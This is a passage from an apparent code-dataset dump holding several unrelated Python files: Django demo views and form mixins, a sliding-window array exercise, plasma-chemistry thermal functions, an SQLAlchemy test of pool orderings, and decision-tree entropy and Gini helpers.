11-29\")\n        elif list_show_ranking == \"down100\":\n            list_label_ranking.append(\"Down 100 or higher\")\n    \n    data = {\n        'list_label_ranking' : list_label_ranking\n    }\n\n    return render(request, 'demoFrontent/chart.html', data)\n\ndef demo(request):\n    dict_contact_marketing = {\n        'subsrciber' : {\n            'label' : 'Subsrciber',\n            'list_contact' : [\n                {\n                    'vid' : '1',\n                    'company' : 'Makudu',\n                    'firstname' : 'Trina',\n                    'lastname' : 'Foo2',\n                    'closedate' : '2019-02-01'\n                
},\n {\n 'vid' : '2',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'lead' : {\n 'label' : 'Lead',\n 'list_contact' : [\n {\n 'vid' : '4',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'marketingqualifiedlead' : {\n 'label' : 'MQL',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n }\n ]\n }\n }\n\n dict_contact_sales = {\n 'subsrciber' : {\n 'label' : 'Subsrciber',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'lead' : {\n 'label' : 'Lead',\n 'list_contact' : [\n {\n 'vid' : '4',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'marketingqualifiedlead' : {\n 'label' : 'MQL',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n }\n ]\n },\n 'whatever1' : {\n 'label' : 'Whatever 1',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever2' : {\n 'label' : 'Whatever 2',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever3' : {\n 'label' : 'Whatever 3',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever4' : {\n 'label' : 'Whatever 4',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : 
'2019-02-01'\n                },\n                {\n                    'vid' : '2',\n                    'company' : 'Makudu',\n                    'firstname' : 'Trina',\n                    'lastname' : 'Foo2',\n                    'closedate' : '2019-02-01'\n                },\n                {\n                    'vid' : '3',\n                    'company' : 'Makudu',\n                    'firstname' : 'Trina',\n                    'lastname' : 'Foo2',\n                    'closedate' : '2019-02-01'\n                },\n            ]\n        }\n\n    }\n\n    data = {\n        'dict_contact_marketing' : dict_contact_marketing,\n        'dict_contact_sales' : dict_contact_sales\n    }\n    return render(request, 'demoFrontent/demo.html', data)\n\ndef demo_sales_setting(request):\n    return render(request, 'demoFrontent/demo_sells_setting.html')\n\ndef ajax_get_form_sale_setting(request):\n    if request.method == 'POST':\n\n        if request.is_ajax():\n            try:\n                # 1) Get the data from the request\n                return render(request, 'demoFrontent/data/data_sale_setting.html')\n\n            except Exception as inst:\n                result = Log().write_log(inst)\n                return HttpResponse(result)\n        \n    return HttpResponse('')\n\n\ndef ajax_refresh_list_Oracle(request):\n    body = \"You have a new contact from [Oracle]テリトリー週次\"\n    url = 'https://local.leadplus.net/report/contact'\n    data = {\n        'body' : body,\n        'url' : url\n    }\n    return render(request, \"demoFrontent/notification.html\", data)","sub_path":"demoFrontent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"149817614","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom django import forms\nfrom thecut.forms.utils import add_css_class\n\n\nclass EmailTypeMixin(object):\n    \"\"\"Adds the HTML5 'email' input type to any email fields.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(EmailTypeMixin, self).__init__(*args, **kwargs)\n\n        # Set HTML5 input type for email fields\n        for field in self.fields.values():\n            if isinstance(field, forms.EmailField):\n                field.widget.input_type = 'email'\n\n\nclass RequiredMixin(object):\n    \"\"\"Adds the HTML5 'required' attribute to any required fields.\"\"\"\n\n    required_css_class = 'required'\n\n    def __init__(self, *args, **kwargs):\n        super(RequiredMixin, self).__init__(*args, **kwargs)\n\n        # Set HTML5 required attributes. Note that if we set the required\n        # attribute on fields with certain widgets, it will cause the form to\n        # break by requiring EVERY option to be selected. This is not possible\n        # with the RadioSelect widget, and in most cases won't be the desired\n        # behaviour with the CheckboxSelectMultiple widget. 
If it is, the\n # required attribute of the widget can still be set manually in the\n # form.\n for field in self.fields.values():\n if field.required and not (\n isinstance(field.widget, forms.CheckboxSelectMultiple) or\n isinstance(field.widget, forms.RadioSelect)):\n field.widget.attrs.update({'required': 'required'})\n\n\nclass MaxLengthMixin(object):\n \"\"\"Adds the HTML5 'maxlength' attribute to applicable Textarea widgets.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MaxLengthMixin, self).__init__(*args, **kwargs)\n\n # HTML5 maxlength attribute for textarea\n for field in self.fields.values():\n if isinstance(field.widget, forms.Textarea) and field.max_length:\n field.widget.attrs.update({'maxlength': field.max_length})\n\n\nclass PlaceholderMixin(object):\n\n class Meta(object):\n placeholders = {}\n\n def __init__(self, *args, **kwargs):\n super(PlaceholderMixin, self).__init__(*args, **kwargs)\n for key, value in self.Meta.placeholders:\n self.fields[key].widget.attrs.update({'placeholder': value})\n\n\nclass TimeClassMixin(object):\n \"\"\"Adds a 'time' css class to any time fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(TimeClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.TimeInput):\n add_css_class(field.widget, 'time')\n\n\nclass DateClassMixin(object):\n \"\"\"Adds a 'date' css class to any date fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.DateInput):\n add_css_class(field.widget, 'date')\n\n\nclass DateTimeClassMixin(object):\n \"\"\"Adds a 'datetime' css class to any datetime fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateTimeClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.DateTimeInput):\n add_css_class(field.widget, 'datetime')\n\n\nclass DateTimeTimezoneMixin(object):\n \"\"\"Adds timezone help text to any datetime fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateTimeTimezoneMixin, self).__init__(*args, **kwargs)\n self._set_timezone_help_texts(data=self.initial)\n\n def _set_timezone_help_texts(self, data):\n for field_name, field in self.fields.items():\n field_data = data.get(field_name)\n if field_data and isinstance(field.widget, forms.DateTimeInput):\n field.help_text = field_data.tzname()\n\n def clean(self, *args, **kwargs):\n cleaned_data = super(DateTimeTimezoneMixin, self).clean(*args,\n **kwargs)\n self._set_timezone_help_texts(data=cleaned_data)\n return cleaned_data\n\n\nclass FormMixin(DateTimeClassMixin, DateClassMixin, EmailTypeMixin,\n MaxLengthMixin, PlaceholderMixin, RequiredMixin,\n TimeClassMixin):\n \"\"\"Form mixin.\n\n Used to extend a standard Django :py:class:`~django.forms.Form` class with\n useful/common behaviour.\n\n \"\"\"\n\n error_css_class = 'error'\n label_suffix = ''\n","sub_path":"thecut/forms/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283453231","text":"#Function to find first negative integer in a particular window\ndef printFirstNegativeInteger(arr, n, k):\n\n #Loop for each subarray\n for i in range(0, (n - k + 1)):\n flag = False\n\n #Traverse 
through current window\n for j in range(0, k):\n # If a negative integer is found, then \n # it is the first negative integer for \n # current window. Print it, set the flag \n # and break \n if(arr[i + j] < 0):\n print(arr[i + j],end = \" \")\n flag = True\n break\n\n # If the current window does not \n # contain a negative integer \n if (not(flag)): \n print(\"0\", end = \" \") \n \n# Driver Code \narr = [12, -1, -7, 8, -15, 30, 16, 28] \nn = len(arr) \nk = 3\nprintFirstNegativeInteger(arr, n, k) \n \n\n","sub_path":"firstnegativeinteger.py","file_name":"firstnegativeinteger.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532792356","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 14:47 2017/7/5\n\n@author: Liu Jinbao\n@mail: liu.jinbao@outlook.com\n@project: PlasmaChemistry\n@IDE: PyCharm\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport re\nfrom math import log\nfrom .. import constants as const\nfrom .read_data import species_thermal_data, molecular_const\n\n\n# ----------------------------------------------------------------------------------------------- #\nclass MoleculeError(Exception):\n \"\"\"pass\"\"\"\n pass\n\n\n# ----------------------------------------------------------------------------------------------- #\ndef get_ideal_gas_density(*, p_Pa, Tgas_K):\n \"\"\"\n Calculate the gas density based on the ideal gas law.\n\n Parameters\n ----------\n p_Pa : float\n Pressure in Pa.\n Tgas_K : float\n Temperature of gas in Kelvin.\n\n Returns\n -------\n density : float\n Gas number density in unit of m^-3\n\n Examples\n --------\n >>> from plasmistry.molecule import get_ideal_gas_density\n >>> from plasmistry import constants as const\n >>> get_ideal_gas_density(p_Pa=const.pressure_STP,Tgas_K=const.temperature_STP)\n 2.6516467463592656e+25\n >>> get_ideal_gas_density(p_Pa=const.pressure_NTP,Tgas_K=const.temperature_NTP)\n 2.5034768825147869e+25\n\n \"\"\"\n assert isinstance(p_Pa, float) or isinstance(p_Pa, int)\n assert isinstance(Tgas_K, float) or isinstance(Tgas_K, int)\n assert p_Pa > 0\n assert Tgas_K > 0\n return p_Pa / const.R / Tgas_K * const.N_A\n\n\ndef get_reaction_enthalpy(*, reaction, particle_enthalpy):\n \"\"\"\n Calculate reaction enthalpy based on enthalpy_dict.\n\n Parameters\n ----------\n reaction : str\n Reaction string like 'A + B => C + D'\n particle_enthalpy : dict\n {particle[string] : enthalpy[float]}\n\n Returns\n -------\n reaction_enthalpy : float\n Reaction enthalpy in unit same with particle_enthalpy value\n\n \"\"\"\n assert isinstance(reaction, str)\n assert '=>' in reaction\n assert isinstance(particle_enthalpy, dict)\n\n rcnt_str, prdt_str = re.split(r'\\s*[<]?[=][>]\\s*', reaction.strip())\n sum_H = lambda _list: sum(\n particle_enthalpy[particle] for particle in _list) if _list else 0.0\n get_H = lambda _str: sum_H(re.split(r'\\s+[+]\\s+', _str.strip()) if _str.strip() else [])\n return get_H(prdt_str) - get_H(rcnt_str)\n\n\n# ----------------------------------------------------------------------------------------------- #\ndef get_vib_energy(molecule, *, quantum_number, state='X', minimum_is_zero=False):\n \"\"\"\n Calculate the vibrational energy of molecule.\n\n Parameters\n ----------\n molecule : str\n The molecule name.\n quantum_number : int or tuple of int\n Quantum number. 
int for diatomic, (int,int,int) for triatomic.\n state : str, optional\n Electric state.\n minimum_is_zero : bool, optional\n Whether the minimum vibrational energy is set at zero.\n\n Returns\n -------\n vibrational energy : float\n Vibrational energy in unit of eV.\n\n \"\"\"\n assert molecule in molecular_const\n if molecule in ('CO', 'O2', 'N2', 'H2'):\n assert isinstance(quantum_number, int), quantum_number\n elif molecule in ('H2O', 'CO2'):\n assert isinstance(quantum_number, tuple), quantum_number\n assert len(quantum_number) == 3\n\n spe_const = molecular_const[molecule][state]\n lamb_diatomic = lambda c, v: const.WNcm2eV * (c['we'] * (v + 0.5) - c['wexe'] * (v + 0.5)**2 +\n c['weye'] * (v + 0.5)**3)\n lamb_triatomic = lambda c, v, n: const.WNcm2eV * sum([c['w1'] * (v[0] + n[0]),\n c['w2'] * (v[1] + n[1]),\n c['w3'] * (v[2] + n[2]),\n c['X11'] * (v[0] + n[0])**2,\n c['X22'] * (v[1] + n[1])**2,\n c['X33'] * (v[2] + n[2])**2,\n c['X12'] * (v[0] + n[0]) * (v[1] + n[1]),\n c['X13'] * (v[0] + n[0]) * (v[2] + n[2]),\n c['X23'] * (v[1] + n[1]) * (v[2] + n[2]),\n c['Xll'] * (v[1]**2 - 1)])\n\n def _get_vib_energy(mole, v):\n if mole in ('CO', 'O2', 'N2', 'H2'):\n return lamb_diatomic(spe_const, v), lamb_diatomic(spe_const, 0)\n elif mole == 'CO2':\n n = (1 / 2, 1, 1 / 2)\n return (lamb_triatomic(spe_const, v, n),\n lamb_triatomic(spe_const, (0, 0, 0), n))\n elif mole == 'H2O':\n n = (1 / 2, 1 / 2, 1 / 2)\n return (lamb_triatomic(spe_const, v, n),\n lamb_triatomic(spe_const, (0, 0, 0), n))\n else:\n raise MoleculeError(\"{}'s data is not imported.\".format(mole))\n\n if minimum_is_zero and (quantum_number == 0 or quantum_number == (0, 0, 0)):\n return 0.0\n if minimum_is_zero:\n return _get_vib_energy(molecule, quantum_number)[0] - \\\n _get_vib_energy(molecule, quantum_number)[1]\n else:\n return _get_vib_energy(molecule, quantum_number)[0]\n\n\n# ----------------------------------------------------------------------------------------------- #\n\nif __name__ == '__main__':\n pass\n","sub_path":"plasmistry/molecule/thermal_calculation.py","file_name":"thermal_calculation.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"433938046","text":"# Without if stamnet can we write else statement ->\n\n\"\"\"\nThe else statement /block we can write along with conditional statemnets\nif and if - elif\n\nAnd alos\n\nwe can write along with iterative statements i.e for and while\n\"\"\"\n\n\n\nfor i in range(10):\n if (i==5):\n print(i)\n break\nelse:\n print(\"Success\")\n","sub_path":"class_examples/fnsummary/adhoc1.py","file_name":"adhoc1.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"64600966","text":"# This prototype uses the SQL Expression Language of SQLAlchemy\n# possibly we could have done the it simpler using the ORM\n# The purpose is however to identify the relational model\n\nimport unittest\nimport exampleModels\nfrom sqlalchemy import Table, Column, Integer, String, MetaData,ForeignKey,ForeignKeyConstraint\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import select\nfrom sympy import Matrix,sympify,symbols,Symbol,IndexedBase\nfrom testinfrastructure.helpers import pe\nfrom createTables import createTables\nfrom sympy import Basic,Symbol,Matrix,symbols\nfrom sympy.vector import CoordSysND, Vector,express\nfrom helpers import (\n defaultOrderingName\n ,addModel\n ,resolve\n 
#,geometric_resolve\n    #,symbolic_resolve\n    #,resolveMatrix\n    #,resolveVector\n    ,addStateVariableOrdering\n    ,getStateVector\n    ,addDerivedVariable\n    #,get_name_spaces\n    ,getHighestExecutionOrder\n)\n\n\nclass TestIndexedVariables(unittest.TestCase):\n    # We invent a minimal ecosystem model with 2 vegetation and 3 soil pools and write it \n    # in block-matrix-form\n    #            .\n    #    ⎡⎡v_l⎤⎤      ⎡⎡ V_11,  V_12⎤⎡VS_11,VS_12, VS_13⎤⎤  ⎡⎡v l⎤⎤   ⎡⎡I_l⎤⎤\n    #    ⎢⎣v_w⎦⎥      ⎢⎣ V_21,  V_22⎦⎣VS_21,VS_22, VS_23⎦⎥  ⎢⎣v w⎦⎥   ⎢⎣I_w⎦⎥\n    #    ⎢     ⎥      ⎢                                  ⎥  ⎢     ⎥   ⎢     ⎥\n    #    ⎢⎡s_f⎤⎥   =  ⎢⎡SV_11, SV_12⎤⎡ S_11, S_12,  S_13⎤⎥ * ⎢⎡s f⎤⎥  +⎢⎡I_f⎤⎥\n    #    ⎢⎢s_s⎥⎥      ⎢⎢SV_21, SV_22⎥⎢ S_21, S_22,  S_23⎥⎥  ⎢⎢s s⎥⎥   ⎢⎢I_s⎥⎥\n    #    ⎣⎣s_b⎦⎦      ⎣⎣SV_31, SV_32⎦⎣ S_31, S_32,  S_33⎦⎦  ⎣⎣s b⎦⎦   ⎣⎣I_b⎦⎦\n    # \n    # The input to the vegetation is often written as a product of distribution vector b and a scalar u\n    #\n    #    ⎡Il⎤   ⎡bl⎤\n    #    ⎢  ⎥ = ⎢  ⎥* u \n    #    ⎣Iw⎦   ⎣bw⎦\n    #\n    # and models are compared with respect to \\vec{b} or \\tens{V} \n    # It is therefore desirable to be able to extract this information from the database.\n    \n    # On the other hand storing this information in the database \n    # has to account for the fact that matrix and vector valued variables \n    # depend on the ordering of the pools (the coordinate system), \n    # although this is not relevant for the solution. \n    \n    # Furthermore different orderings are useful for different purposes (clustering different soil levels or all microbial pools, or ..)\n    # Therefore if we define tuple- or matrix-valued variables we implicitly always define them along with an ordering of the state variables \n    \n    # The block-matrix-decomposition is NOT preserved under general permutations \n    # of the order of state variables.(Only for those permutations inside blocks)\n    # On the other hand sums and products of matrices ARE preserved under coordinate transformations. \n    # In order to be able to retrieve the vegetation part after a variable transformation \n    # (e.g. a permutation)\n    # We could therefore write the above equation with full sized matrices and vectors as\n    #     .       .       .\n    #    ⎡v_l⎤   ⎡v_l⎤   ⎡ 0 ⎤ \n    #    ⎢v_w⎥   ⎢v_w⎥   ⎢ 0 ⎥ \n    #    ⎢   ⎥ = ⎢   ⎥ + ⎢   ⎥ \n    #    ⎢s_f⎥   ⎢ 0 ⎥   ⎢s_f⎥ \n    #    ⎢s_s⎥   ⎢ 0 ⎥   ⎢s_s⎥ \n    #    ⎣s_b⎦   ⎣ 0 ⎦   ⎣s_b⎦ \n    \n    #  ⎡ ⎡ V_11,  V_12       0 ,    0 ,    0   ⎤\n    #  ⎢ ⎢ V_21,  V_22       0 ,    0 ,    0   ⎥\n    #  = ⎢ ⎢  0 ,    0        0 ,    0 ,    0   ⎥\n    #  ⎢ ⎢  0 ,    0        0 ,    0 ,    0   ⎥\n    #  ⎣ ⎣  0 ,    0        0 ,    0 ,    0   ⎦\n    #\n    #    ⎡ 0 , 0              VS_11,VS_12, VS_13⎤ \n    #    ⎢ 0 , 0              VS_21,VS_22, VS_23⎥ \n    #  + ⎢ 0 , 0              0 ,    0 ,    0   ⎥ \n    #    ⎢ 0 , 0              0 ,    0 ,    0   ⎥ \n    #    ⎣ 0 , 0              0 ,    0 ,    0   ⎦ \n    # \n    #    ⎡ 0 , 0              0 ,    0 ,    0    ⎤ \n    #    ⎢ 0 , 0              0 ,    0 ,    0    ⎥ \n    #  + ⎢SV_11, SV_12        0 ,    0 ,    0    ⎥ \n    #    ⎢SV_21, SV_22        0 ,    0 ,    0    ⎥ \n    #    ⎣SV_31, SV_32        0 ,    0 ,    0    ⎦ \n    # \n    #  ⎡ 0 , 0              0 ,    0 ,    0    ⎤  ⎤       ⎡ ⎡v l⎤    ⎡ 0 ⎤  ⎤ \n    #  ⎢ 0 , 0              0 ,    0 ,    0    ⎥  ⎥       ⎢ ⎢v w⎥    ⎢ 0 ⎥  ⎥ \n    #  + ⎢ 0 , 0              S_11, S_12, S_13⎥  ⎥    *  ⎢ ⎢ 0 ⎥  + ⎢s f⎥  ⎥ \n    #  ⎢ 0 , 0              S_21, S_22, S_23⎥  ⎥       ⎢ ⎢ 0 ⎥    ⎢s s⎥  ⎥ \n    #  ⎣ 0 , 0              S_31, S_32, S_33⎦  ⎦       ⎣ ⎣ 0 ⎦    ⎣s b⎦  ⎦ \n    #\n    #    ⎡I_l⎤    ⎡ 0 ⎤\n    #    ⎢I_w⎥    ⎢ 0 ⎥\n    #  + ⎢ 0 ⎥  + ⎢I_f⎥\n    #    ⎢ 0 ⎥    ⎢I_s⎥\n    #    ⎣ 0 ⎦    ⎣I_b⎦\n    #\n    # These building blocks can be transformed in the usual way, e.g. 
\n    # \n    # in the default state variable ordering we have\n    #\n    #      ⎡ V_11, V_12,  0 ,    0 ,    0    ⎤\n    #      ⎢ V_21, V_22,  0 ,    0 ,    0    ⎥\n    # V =  ⎢  0 ,   0 ,   0 ,    0 ,    0    ⎥\n    #      ⎢  0 ,   0 ,   0 ,    0 ,    0    ⎥\n    #      ⎣  0 ,   0 ,   0 ,    0 ,    0    ⎦\n    # \n    # after the permutation we have: V'= P * V * P^-1, for instance (for a permutation P that\n    # exchanges row 2 and 5 in the original statevector)\n    # \n    #      ⎡ V_11,  0 ,   0 ,    0 ,   V_12  ⎤\n    #      ⎢  0 ,   0 ,   0 ,    0 ,    0    ⎥\n    # V'=  ⎢  0 ,   0 ,   0 ,    0 ,    0    ⎥\n    #      ⎢  0 ,   0 ,   0 ,    0 ,    0    ⎥\n    #      ⎣ V_21,  0 ,   0 ,    0 ,   V_22  ⎦\n    #\n    # which still contains only vegetation related entries although it is not a block matrix anymore.\n    \n    # The purpose of these tests is to infer what kind of information we can retrieve depending \n    # on the storage scheme we choose.\n    def setUp(self):\n        #engine = create_engine('sqlite:///:memory:', echo=True)\n        #metadata = MetaData()\n\n        metadata,engine=createTables()\n        self.metadata=metadata\n        self.engine=engine\n\n\n    def test_scalar_invariants(self):\n        # Take a coordinate independent scalar like the complete influx to the vegetation pools\n        # \n        # NetVegIn=I_l+I_w\n        # \n        # Since we store expressions as strings a user could by means of some indexed variables\n        # \n        # I =Matrix([I_l,I_w,I_f,I_s,I_b]) \n        # \n        # NetVegIn=I[0]+I[1]\n        #\n        # The indices 0 and 1 are only correct for coordinate systems where I_l and I_w are the first\n        # two components. This has the following implications\n        # 1.) We have to store the coordinate system along with the variables\n        # 2.) All expressions that depend on an indexed expression are only valid in the original coordinate \n        #     system and must therefore be executed there to get the value\n\n        metadata=self.metadata\n        engine=self.engine\n        model_id='default_2'\n        exampleModels.addFivePoolModel(metadata,engine,model_id,'matrix test')\n        \n        addDerivedVariable(\n            metadata\n            ,engine\n            ,model_id\n            ,symbol='I'\n            ,description='net influx to vegetation pools'\n            ,expression='Matrix([Ivl,Ivw,0,0,0])' \n            ,execution_order=22\n            ,coord_system_id=defaultOrderingName\n            \n        )\n        addDerivedVariable(\n            metadata\n            ,engine\n            ,model_id=model_id\n            ,symbol='NetVegIn'\n            ,description='Input tuple'\n            ,expression='sum(I[0:2])'\n            ,execution_order=23\n            ,coord_system_id=defaultOrderingName\n            \n        )\n\n        res_0 = resolve(metadata,engine,\"NetVegIn\",model_id,coord_system_id=defaultOrderingName)\n\n        my_ordering_name='veg_2'\n\n        addStateVariableOrdering(metadata,engine,model_id,state_variable_symbols=[ \"sb\", \"vl\",\"sf\", \"ss\",\"vw\"],coord_system_id=my_ordering_name)\n        res_1 = resolve(metadata,engine,\"NetVegIn\",model_id,coord_system_id=my_ordering_name)\n        self.assertEqual(res_0,res_1)\n\n        # now assume that the target variable has NOT been defined with respect to the same coordinate system as the variables it depends on\n\n        # we have to make sure that we get an exception if we try\n\n        \n        addDerivedVariable(\n            metadata\n            ,engine\n            ,model_id=model_id\n            ,symbol='NetVegIn2'\n            ,description='cumulative Input to all vegetation pools'\n            ,expression='sum(I[1]+I[4])'\n            ,execution_order=23\n            ,coord_system_id=my_ordering_name\n            \n        )\n        with self.assertRaises(Exception) as e:\n            res_1 = resolve(metadata,engine,\"NetVegIn2\",model_id,coord_system_id=my_ordering_name)\n\n        \n    def test_vector_component_transformation(self):\n        # Take a vector like the influx to the model \n        # \n        # The components may be given by a matrix\n        # \n        # I =Matrix([I_l,I_w,I_f,I_s,I_b]) \n        # \n\n        metadata=self.metadata\n        engine=self.engine\n        model_id='default_2'\n        exampleModels.addFivePoolModel(metadata,engine,model_id,'matrix test')\n        \n        
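# Explanatory note (added): derived variables are stored as expression\n        # strings, so each one is tied to the coordinate system (pool ordering)\n        # it was defined in, as the comments above spell out.\n        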
addDerivedVariable(\n            metadata\n            ,engine\n            ,model_id\n            ,symbol='I'\n            ,description='influx vector components'\n            ,expression='Matrix([Ivl,Ivw,0,0,0])' \n            ,execution_order=22\n            ,coord_system_id=defaultOrderingName\n            \n        )\n        # We can resolve it in any coordinate system if we know the transformation of the base vectors\n        # (which in our case will be a permutation)\n        res_0 = resolve(metadata,engine,\"I\",model_id,coord_system_id=defaultOrderingName)\n        self.assertEqual(res_0,sympify('Matrix([Ivl,kIvw*vw,0,0,0])')) \n\n        # we add a permutation \n        my_ordering_name='veg_2'\n        addStateVariableOrdering(metadata,engine,model_id,state_variable_symbols=[ \"sb\", \"vl\",\"sf\", \"ss\",\"vw\"],coord_system_id=my_ordering_name)\n        res_1 = resolve(metadata,engine,\"I\",model_id,coord_system_id=my_ordering_name)\n        self.assertEqual(res_1,sympify('Matrix([0,Ivl,0,0,kIvw*vw])'))\n\n        # now assume that the target variable is not a column vector of size n \n        # or a matrix of size nxn\n\n        # we have to make sure that we get an exception if we try to transform \n        # something of this kind\n        addDerivedVariable(\n            metadata\n            ,engine\n            ,model_id\n            ,symbol='Iveg'\n            ,description='net influx to vegetation pools'\n            ,expression='Matrix([Ivl,Ivw])' \n            ,execution_order=23\n            ,coord_system_id=defaultOrderingName\n            \n        )\n        with self.assertRaises(Exception) as e:\n            res_1 = resolve(metadata,engine,\"Iveg\",model_id,coord_system_id=my_ordering_name)\n\n\n    \n\n\n    \n","sub_path":"prototypes/databases/SQLAlchemy/Schema2/TestIndexedExpression.py","file_name":"TestIndexedExpression.py","file_ext":"py","file_size_in_byte":11734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"432155826","text":"import pandas as pd\nimport numpy as np\n\n\n# Compute the entropy contribution of one class\ndef entropy(x, m):\n\ttemp = float(x/m)\n\treturn -temp*np.log2(temp)\n\n# Compute the empirical entropy of the sample\ndef emp_entropy(data):\n\tclass_nums = data.groupby(data.iloc[:, -1]).size().values\n\tm ,n = data.shape\n\tH_D = np.sum(entropy(x, m) for x in class_nums)\n\treturn H_D\n\n# Compute the empirical conditional entropy\ndef entropy_condition(data, n_split):\n\ttotal_len = len(data)\n\tnum_class = set(data.iloc[:, n_split])\n\tcondition_entropy = 0\n\tfor part in num_class:\n\t\tsub_data = data[data.iloc[:, n_split] == part]\n\t\tsub_classes = sub_data.groupby(sub_data.iloc[:, -1]).size().values\n\t\tsub_len = len(sub_data)\n\t\tsub_sum = np.sum(entropy(x, sub_len) for x in sub_classes)\n\t\tcondition_entropy += (sub_len / total_len) * sub_sum\n\n\treturn condition_entropy\n\n# Compute the Gini index\ndef gini(data):\n\tclasses = data.groupby([data.iloc[:,-1]]).size().values\n\tm, n = data.shape\n\tgini = 1.0 - np.sum((x/m)**2 for x in classes)\n\treturn gini\n\t\t\t\t\n# Find the split point with the smallest Gini index for each column\ndef gini_col(data):\n\tm, n = data.shape\n\tcol_split = {}\n\tfor col in range(n-1):\n\t\tpoint_split = list(set(data.iloc[:, col]))\n\t\tgini_list = []\n\t\tfor num in point_split:\n\t\t\tdata_left = data[data.iloc[:, col] <= num]\n\t\t\tdata_right = data[data.iloc[:, col] > num]\n\t\t\tdata_gini = data_left.shape[0]/m * gini(data_left) + data_right.shape[0]/m * gini(data_right)\n\t\t\tgini_list.append(data_gini)\n\n\t\tmin_gini = 